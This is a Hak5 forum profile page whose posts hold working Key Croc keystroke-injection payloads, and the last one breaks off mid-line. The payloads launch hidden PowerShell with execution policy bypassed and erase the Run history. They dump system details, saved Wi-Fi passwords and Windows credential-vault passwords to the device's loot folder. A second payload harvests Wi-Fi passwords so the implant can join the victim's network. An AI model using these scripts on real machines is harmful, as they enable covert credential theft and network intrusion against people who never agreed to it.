Jump to content

spywill

Active Members
  • Content Count

    81
  • Joined

  • Last visited

  • Days Won

    2

About spywill

  • Rank
    Hak5 Fan ++

Profile Information

  • Gender
    Male
  • Interests
    Programming\networking

Recent Profile Visitors

445 profile views
  1. the keycroc was not design for a Laptop more for Desktop so you can hide it yes you need a keyboard plug in the keycroc I have not tested this yet but if you get your keycroc online then ssh into it you may be able to run payloads with out a keyboard or run them from Cloud C2
  2. This is just my opinion get them both they are great working gear it's all depend what you want to do with them and for payloads make them yourself for what you want them to do hope this helps
  3. this is a bash bunny payload from https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber convert to a keycroc payload the payload is working on the keycroc just need to place all three files into the payloads folder on the keycroc and then type pcinfo and all the loot will be saved to the loot/info folder on the keycroc info.ps1 payload.txt run.ps1 payload.txt MATCH pcinfo QUACK LOCK # --> udisk unmount ATTACKMODE HID STORAGE QUACK DELAY 5000 QUACK GUI d QUACK GUI r QUACK DELAY 500 QUACK STRING "powershell -nop -ex Bypass -w Hidden" QUACK ENTER QUACK DELAY 1000 QUACK STRING ".((gwmi win32_volume -f 'label=''KeyCroc''').Name+'payloads\run.ps1')" QUACK ENTER run.ps1 #Remove run history powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" #Get the path and file name that you are using for output # find connected KeyCroc drive: $VolumeName = "KeyCroc" $computerSystem = Get-CimInstance CIM_ComputerSystem $backupDrive = $null Get-WmiObject win32_logicaldisk | % { if ($_.VolumeName -eq $VolumeName) { $backupDrive = $_.DeviceID } } #See if a loot folder exist in usb. If not create one $TARGETDIR = $backupDrive + "\loot" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #See if a info folder exist in loot folder. If not create one $TARGETDIR = $backupDrive + "\loot\info" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #Create a path that will be used to make the file $datetime = get-date -f yyyy-MM-dd_HH-mm $backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt" #Create output from info script $TARGETDIR = $MyInvocation.MyCommand.Path $TARGETDIR = $TARGETDIR -replace ".......$" cd $TARGETDIR PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath info.ps1 # Shows details of currently running PC # Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0) #Get info about pc # Get IP / Nework Info try { $computerPubIP = (Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content } catch { $computerPubIP = "Error getting Public IP" } $computerIP = Get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1} $IsDHCPEnabled = $False $Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled} foreach ($Network in $Networks) { If($network.DHCPEnabled) { $IsDHCPEnabled = $True } [string[]]$computerMAC = $Network.MACAddress } #Get System Info $computerSystem = Get-CimInstance CIM_ComputerSystem $computerBIOS = Get-CimInstance CIM_BIOSElement $computerOs = Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List $computerCpu = Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List $computerMainboard = Get-WmiObject Win32_BaseBoard | Format-List $computerRamCapacity = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)} $computerRam = Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table # Get HDDs $driveType = @{ 2="Removable disk " 3="Fixed local disk " 4="Network disk " 5="Compact disk "} $Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } #Get - Com & Serial Devices $COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table # Check RDP $RDP if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) { $RDP = "RDP is Enabled" } else { $RDP = "RDP is NOT Enabled" } # Get Network Interfaces $Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress # Get wifi SSIDs and Passwords $WLANProfileNames = @() #Get all the WLAN profile names $Output = netsh.exe wlan show profiles | Select-String -pattern ":" #Trim the output to receive only the name Foreach($WLANProfileName in $Output){ $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim() } $WLANProfileObjects = @() #Bind the WLAN profile names and also the password to a custom object Foreach($WLANProfileName in $WLANProfileNames){ #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user try{ $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim() } Catch { $WLANProfilePassword = "The password is not stored in this profile" } #Build the object and add this to an array $WLANProfileObject = New-Object PSCustomobject $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword $WLANProfileObjects += $WLANProfileObject Remove-Variable WLANProfileObject } # local-user $luser = Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID # process first $process = Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine # Get Listeners / ActiveTcpConnections $listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess $listener = $listener | foreach-object { $listenerItem = $_ $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess }) new-object PSObject -property @{ "LocalAddress" = $listenerItem.LocalAddress "RemoteAddress" = $listenerItem.RemoteAddress "State" = $listenerItem.State "AppliedSetting" = $listenerItem.AppliedSetting "OwningProcess" = $listenerItem.OwningProcess "ProcessName" = $processItem.ProcessName } } | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table # process last $process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine # service $service = Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName # installed software (get uninstaller) $software = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize # drivers $drivers = Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion # videocard $videocard = Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution #Get stored passwords [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } #The output Clear-Host Write-Host $computerSystem.Name "==================================================================" "Manufacturer: " + $computerSystem.Manufacturer "Model: " + $computerSystem.Model "Serial Number: " + $computerBIOS.SerialNumber "" "" "" "OS:" "=================================================================="+ ($computerOs | out-string) "CPU:" "=================================================================="+ ($computerCpu | out-string) "RAM:" "==================================================================" "Capacity: " + $computerRamCapacity+ ($computerRam | out-string) "Mainboard:" "=================================================================="+ ($computerMainboard | out-string) "Bios:" "=================================================================="+ (Get-WmiObject win32_bios | out-string) "Local-user:" "=================================================================="+ ($luser | out-string) "HDDs:" "=================================================================="+ ($Hdds | out-string) "COM & SERIAL DEVICES:" "=================================================================="+ ($COMDevices | Out-String) "Network:" "==================================================================" "Computers MAC address: " + $computerMAC "Computers IP address: " + $computerIP.ipaddress[0] "Public IP address: " + $computerPubIP "RDP: " + $RDP "" ($Network | out-string) "W-Lan profiles:" "=================================================================="+ ($WLANProfileObjects | out-string) "listeners / ActiveTcpConnections:" "=================================================================="+ ($listener | out-string) "Current running process:" "=================================================================="+ ($process | out-string) "Services:" "=================================================================="+ ($service | out-string) "Installed software:" "=================================================================="+ ($software | out-string) "Installed drivers:" "=================================================================="+ ($drivers | out-string) "Installed videocards:" "=================================================================="+ ($videocard | out-string) "Windows/user passwords:" "==================================================================" $vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize Remove-Variable -Name computerPubIP, computerIP,IsDHCPEnabled,Network,Networks, computerMAC,computerSystem,computerBIOS,computerOs, computerCpu, computerMainboard,computerRamCapacity, computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName, Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser, process,listener,listenerItem,process,service,software,drivers,videocard, vault -ErrorAction SilentlyContinue -Force this was my first attempt does not save to loot folder MATCH pcinfo # --> udisk unmount ATTACKMODE HID STORAGE QUACK DELAY 5000 QUACK GUI d QUACK GUI r QUACK DELAY 1000 QUACK STRING powershell QUACK ENTER QUACK DELAY 1000 # --> Remove run history QUACK STRING "\"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"" QUACK ENTER QUACK DELAY 1000 # --> Get the path and file name that you are using for output # --> find connected KeyCroc drive: QUACK STRING "\$VolumeName = \"KeyCroc\"" QUACK ENTER QUACK STRING "\$computerSystem = Get-CimInstance CIM_ComputerSystem" QUACK ENTER QUACK DELAY 1000 QUACK STRING "\$backupDrive = \$null" QUACK ENTER QUACK STRING "get-wmiobject win32_logicaldisk | % {" QUACK ENTER QUACK STRING "if (\$_.VolumeName -eq \$VolumeName) {" QUACK ENTER QUACK STRING "\$backupDrive = \$_.DeviceID" QUACK ENTER QUACK STRING "}" QUACK ENTER QUACK STRING "}" QUACK ENTER # --> See if a loot folder exist in keycroc. If not create one QUACK STRING "\$TARGETDIR = \$backupDrive + \"\loot\"" QUACK ENTER QUACK STRING "if(!(Test-Path -Path \$TARGETDIR )){" QUACK ENTER QUACK STRING "New-Item -ItemType directory -Path \$TARGETDIR" QUACK ENTER QUACK STRING "}" QUACK ENTER QUACK DELAY 1000 # --> See if a info folder exist in loot folder. If not create one QUACK STRING "\$TARGETDIR = \$backupDrive + \"\loot\info\"" QUACK ENTER QUACK STRING "if(!(Test-Path -Path \$TARGETDIR )){" QUACK ENTER QUACK STRING "New-Item -ItemType directory -Path \$TARGETDIR" QUACK ENTER QUACK STRING "}" QUACK ENTER QUACK DELAY 1000 # --> Create a path that will be used to make the file QUACK STRING "\$datetime = get-date -f yyyy-MM-dd_HH-mm" QUACK ENTER QUACK STRING "\$backupPath = \$backupDrive + \"\loot\info\" + \$computerSystem.Name + \" - \" + \$datetime + \".txt\"" QUACK ENTER QUACK DELAY 1000 # --> Create output from info script QUACK STRING "\$TARGETDIR = \$MyInvocation.MyCommand.Path" QUACK ENTER QUACK DELAY 1000 QUACK STRING "\$TARGETDIR = \$TARGETDIR -replace \".......\$\"" QUACK ENTER QUACK DELAY 1000 QUACK STRING "cd \$TARGETDIR" QUACK ENTER #QUACK STRING "PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > \$backupPath" QUACK ENTER QUACK DELAY 1000 # --> Shows details of currently running PC # --> Get info about pc # --> Get IP / Nework Info QUACK DELAY 1000 QUACK STRING "try" QUACK ENTER QUACK STRING "{" QUACK ENTER QUACK STRING "\$computerPubIP = (Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content" QUACK ENTER QUACK STRING "}" QUACK ENTER QUACK STRING "catch" QUACK ENTER QUACK STRING "{" QUACK ENTER QUACK STRING "\$computerPubIP = \"Error getting Public IP\"" QUACK ENTER QUACK STRING "}" QUACK ENTER QUACK STRING "\$computerIP = Get-WmiObject Win32_NetworkAdapterConfiguration|Where {\$_.Ipaddress.length -gt 1}" QUACK ENTER QUACK STRING "\$IsDHCPEnabled = \$False" QUACK ENTER QUACK STRING "\$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter \"DHCPEnabled=\$True\" | ? {\$_.IPEnabled}" QUACK ENTER QUACK STRING "foreach (\$Network in \$Networks) {" QUACK ENTER QUACK STRING "If(\$network.DHCPEnabled) {" QUACK ENTER QUACK STRING "\$IsDHCPEnabled = \$True" QUACK ENTER QUACK STRING "}" QUACK ENTER QUACK STRING "[string[]]\$computerMAC = \$Network.MACAddress" QUACK ENTER QUACK STRING "}" QUACK ENTER # --> Get System Info QUACK DELAY 1000 QUACK STRING "\$computerSystem = Get-CimInstance CIM_ComputerSystem" QUACK ENTER QUACK STRING "\$computerBIOS = Get-CimInstance CIM_BIOSElement" QUACK ENTER QUACK STRING "\$computerOs = Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name=\"InstallDate\";Expression={([WMI]'').ConvertToDateTime(\$_.InstallDate)}} , @{Name=\"LastBootUpTime\";Expression={([WMI]'').ConvertToDateTime(\$_.LastBootUpTime)}}, @{Name=\"LocalDateTime\";Expression={([WMI]'').ConvertToDateTime(\$_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List" QUACK ENTER QUACK STRING "\$computerCpu = Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List" QUACK ENTER QUACK STRING "\$computerMainboard = Get-WmiObject Win32_BaseBoard | Format-List" QUACK ENTER QUACK STRING "\$computerRamCapacity = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { \"{0:N1} GB\" -f (\$_.sum / 1GB)}" QUACK ENTER QUACK STRING "\$computerRam = Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name=\"Capacity\";Expression={ \"{0:N1} GB\" -f (\$_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table" QUACK ENTER # --> Get HDDs QUACK DELAY 1000 QUACK STRING "\$driveType = @{" QUACK ENTER QUACK STRING "2=\"Removable disk\"" QUACK ENTER QUACK STRING "3=\"Fixed local disk\"" QUACK ENTER QUACK STRING "4=\"Network disk\"" QUACK ENTER QUACK STRING "5=\"Compact disk\"}" QUACK ENTER QUACK STRING "\$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name=\"DriveType\";Expression={\$driveType.item([int]\$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name=\"Size_GB\";Expression={\"{0:N1} GB\" -f (\$_.Size / 1Gb)}}, @{Name=\"FreeSpace_GB\";Expression={\"{0:N1} GB\" -f (\$_.FreeSpace / 1Gb)}}, @{Name=\"FreeSpace_percent\";Expression={\"{0:N1}%\" -f ((100 / (\$_.Size / \$_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber, @{ Name=\"Size GB\"; Expression={\$_.Size_GB}; align=\"right\"; }, @{ Name=\"FreeSpace GB\"; Expression={\$_.FreeSpace_GB}; align=\"right\"; }, @{ Name=\"FreeSpace %\"; Expression={\$_.FreeSpace_percent}; align=\"right\"; }" QUACK ENTER # --> Get - Com & Serial Devices QUACK DELAY 1000 QUACK STRING "\$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi](\$_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table" QUACK ENTER # --> Check RDP QUACK STRING "\$RDP" QUACK DELAY 1000 QUACK ENTER QUACK STRING "if ((Get-ItemProperty \"hklm:\System\CurrentControlSet\Control\Terminal Server\").fDenyTSConnections -eq 0) {" QUACK ENTER QUACK STRING "\$RDP = \"RDP is Enabled\"" QUACK ENTER QUACK STRING "} else {" QUACK ENTER QUACK STRING "\$RDP = \"RDP is NOT Enabled\"" QUACK ENTER QUACK STRING "}" QUACK ENTER # --> Get Network Interfaces QUACK DELAY 1000 QUACK STRING "\$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { \$_.MACAddress -notlike \$null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress" QUACK ENTER # --> Get wifi SSIDs and Passwords QUACK DELAY 1000 QUACK STRING "\$WLANProfileNames = @()" QUACK ENTER # --> Get all the WLAN profile names QUACK DELAY 1000 QUACK STRING "\$Output = netsh.exe wlan show profiles | Select-String -pattern \":\"" QUACK ENTER # --> Trim the output to receive only the name QUACK DELAY 1000 QUACK STRING "Foreach(\$WLANProfileName in \$Output){" QUACK ENTER QUACK STRING "\$WLANProfileNames += ((\$WLANProfileName -split \":\")[1]).Trim()" QUACK ENTER QUACK STRING "}" QUACK ENTER QUACK STRING "\$WLANProfileObjects = @()" QUACK ENTER # --> Bind the WLAN profile names and also the password to a custom object QUACK DELAY 1000 QUACK STRING "Foreach(\$WLANProfileName in \$WLANProfileNames){" QUACK ENTER # --> get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user QUACK DELAY 1000 QUACK STRING "try" QUACK ENTER QUACK STRING "{" QUACK ENTER QUACK STRING "\$WLANProfilePassword = (((netsh.exe wlan show profiles name=\"\$WLANProfileName\" key=clear | select-string -Pattern \"Key Content\") -split \":\")[1]).Trim()" QUACK ENTER QUACK STRING "}" QUACK ENTER QUACK STRING "Catch" QUACK ENTER QUACK STRING "{" QUACK ENTER QUACK STRING "\$WLANProfilePassword = \"The password is not stored in this profile\"" QUACK ENTER QUACK STRING "}" QUACK ENTER QUACK DELAY 2000 # --> Build the object and add this to an array QUACK STRING "\$WLANProfileObject = New-Object PSCustomobject" QUACK ENTER QUACK STRING "\$WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfileName\" -Value \$WLANProfileName" QUACK ENTER QUACK STRING "\$WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfilePassword\" -Value \$WLANProfilePassword" QUACK ENTER QUACK STRING "\$WLANProfileObjects += \$WLANProfileObject" QUACK ENTER QUACK STRING "Remove-Variable WLANProfileObject" QUACK ENTER QUACK STRING "}" QUACK ENTER # --> local-user QUACK DELAY 1000 QUACK STRING "\$luser = Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID" QUACK ENTER # --> process first QUACK DELAY 1000 QUACK STRING "\$process = Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine" QUACK ENTER # --> Get Listeners / ActiveTcpConnections QUACK DELAY 1000 QUACK STRING "\$listener = Get-NetTCPConnection | select @{Name=\"LocalAddress\";Expression={\$_.LocalAddress + \":\" + \$_.LocalPort}}, @{Name=\"RemoteAddress\";Expression={\$_.RemoteAddress + \":\" + \$_.RemotePort}}, State, AppliedSetting, OwningProcess" QUACK ENTER QUACK STRING "\$listener = \$listener | foreach-object {" QUACK ENTER QUACK STRING "\$listenerItem = \$_" QUACK ENTER QUACK STRING "\$processItem = (\$process | where { [int]\$_.Handle -like [int]\$listenerItem.OwningProcess })" QUACK ENTER QUACK STRING "new-object PSObject -property @{" QUACK ENTER QUACK STRING "\"LocalAddress\" = \$listenerItem.LocalAddress" QUACK ENTER QUACK STRING "\"RemoteAddress\" = \$listenerItem.RemoteAddress" QUACK ENTER QUACK STRING "\"State\" = \$listenerItem.State" QUACK ENTER QUACK STRING "\"AppliedSetting\" = \$listenerItem.AppliedSetting" QUACK ENTER QUACK STRING "\"OwningProcess\" = \$listenerItem.OwningProcess" QUACK ENTER QUACK STRING "\"ProcessName\" = \$processItem.ProcessName" QUACK ENTER QUACK STRING "}" QUACK ENTER QUACK STRING "} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table" QUACK ENTER # --> process last QUACK DELAY 1000 QUACK STRING "\$process = \$process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine" QUACK ENTER # --> service QUACK DELAY 1000 QUACK STRING "\$service = Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name=\"Sort\";Expression={\$_.State + \$_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName" QUACK ENTER # --> installed software (get uninstaller) QUACK DELAY 1000 QUACK STRING "\$software = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { \$_.DisplayName -notlike \$null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize" QUACK ENTER # --> drivers QUACK DELAY 1000 QUACK STRING "\$drivers = Get-WmiObject Win32_PnPSignedDriver | where { \$_.DeviceName -notlike \$null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion" QUACK ENTER # --> videocard QUACK DELAY 1000 QUACK STRING "\$videocard = Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution" QUACK ENTER # --> Get stored passwords QUACK DELAY 1000 QUACK STRING "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]" QUACK ENTER QUACK STRING "\$vault = New-Object Windows.Security.Credentials.PasswordVault" QUACK ENTER QUACK STRING "\$vault = \$vault.RetrieveAll() | % { \$_.RetrievePassword();\$_ }" QUACK ENTER # --> The output QUACK DELAY 2000 QUACK STRING "Clear-Host" QUACK ENTER QUACK STRING "Write-Host" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\$computerSystem.Name" QUACK ENTER QUACK STRING "\"==================================================================\"" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Manufacturer: \" + \$computerSystem.Manufacturer" QUACK ENTER QUACK STRING "\"Model: \" + \$computerSystem.Model" QUACK ENTER QUACK STRING "\"Serial Number: \" + \$computerBIOS.SerialNumber" QUACK ENTER QUACK STRING "\"\"" QUACK ENTER QUACK STRING "\"\"" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"\"" QUACK ENTER QUACK STRING "\"OS:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$computerOs | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK ENTER QUACK STRING "\"CPU:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$computerCpu | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"RAM:\"" QUACK ENTER QUACK STRING "\"==================================================================\"" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Capacity: \" + \$computerRamCapacity+ (\$computerRam | out-string)" QUACK ENTER QUACK STRING "\"Mainboard:\"" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"==================================================================\"+ (\$computerMainboard | out-string)" QUACK ENTER QUACK STRING "\"Bios:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (Get-WmiObject win32_bios | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Local-user:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$luser | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"HDDs:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$Hdds | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"COM & SERIAL DEVICES:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$COMDevices | Out-String)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Network:\"" QUACK ENTER QUACK STRING "\"==================================================================\"" QUACK ENTER QUACK STRING "\"Computers MAC address: \" + \$computerMAC" QUACK ENTER QUACK STRING "\"Computers IP address: \" + \$computerIP.ipaddress[0]" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Public IP address: \" + \$computerPubIP" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"RDP: \" + \$RDP" QUACK ENTER QUACK STRING "\"\"" QUACK ENTER QUACK STRING "(\$Network | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"W-Lan profiles:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$WLANProfileObjects | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"listeners / ActiveTcpConnections:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$listener | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Current running process:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$process | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Services:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$service | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Installed software:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$software | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Installed drivers:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$drivers | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Installed videocards:\"" QUACK ENTER QUACK STRING "\"==================================================================\"+ (\$videocard | out-string)" QUACK ENTER QUACK DELAY 2000 QUACK STRING "\"Windows/user passwords:\"" QUACK ENTER QUACK STRING "\"==================================================================\"" QUACK ENTER QUACK STRING "\$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize" QUACK ENTER QUACK DELAY 2000 QUACK STRING "Remove-Variable -Name computerPubIP," QUACK ENTER QUACK STRING "computerIP,IsDHCPEnabled,Network,Networks," QUACK ENTER QUACK STRING "computerMAC,computerSystem,computerBIOS,computerOs," QUACK ENTER QUACK STRING "computerCpu, computerMainboard,computerRamCapacity," QUACK ENTER QUACK STRING "computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName," QUACK ENTER QUACK STRING "Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser," QUACK ENTER QUACK STRING "process,listener,listenerItem,process,service,software,drivers,videocard," QUACK ENTER QUACK STRING "vault -ErrorAction SilentlyContinue -Force" QUACK ENTER #ATTACKMODE HID QUACK DELAY 5000
  4. Windows Get online Key Croc can get online automatically to target pc wifi or to your own wifi -After the payload is done running you will have to unplug and plug back in the Key Croc or wait until the pc reboots -You may have to delete the config.txt file off your Key Croc first for the payload to work properly the Key Croc will create a new config.txt automatically -Keep in mind that the Key Croc can be seen on the target network it is connected to so if anyone does a network scan or any type of network monitoring they will see the Key Croc BACKUP YOUR config.txt from your keycroc first before running this Edit the delays to make it faster -update remove some extra lines and some miner changes -powershell running in background now -No .txt files will be saved to target pc now all to loot folder # Title: Windows Get online # Description: Get online automatically to target pc wifi or to your own wifi # Author: spywill # Version: 1.3 # Category: Key Croc # Props: Darren Kitchen, RootJunky, Cribbit, Lodrix # # MATCH getonline QUACK LOCK # --> udisk unmount ATTACKMODE HID STORAGE QUACK DELAY 5000 # --> Close all windows(add more QUACK DELETE if you think more window are open) QUACK CONTROL-ALT-TAB QUACK DELETE QUACK DELETE QUACK DELETE QUACK DELAY 500 # --> Minimize all windows QUACK GUI d # --> Open cmd QUACK GUI r QUACK DELAY 500 # --> Open powershell QUACK STRING "powershell -NoP -NonI -W Hidden -Exec Bypass" QUACK ENTER QUACK DELAY 1000 # --> Get KeyCroc drive QUACK STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)" QUACK ENTER QUACK DELAY 1000 # --> Create Wifipasswd.txt with all SSID and PASSWD put in Keycroc loot folder QUACK STRING "(netsh wlan show profiles) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | Format-Table -AutoSize | Out-File \"\$Croc\loot\Wifipasswd.txt\"" QUACK ENTER QUACK DELAY 1000 # --> Create wifipass.txt with the taget pc SSID and PASSWD put in Keycroc loot folder QUACK STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key 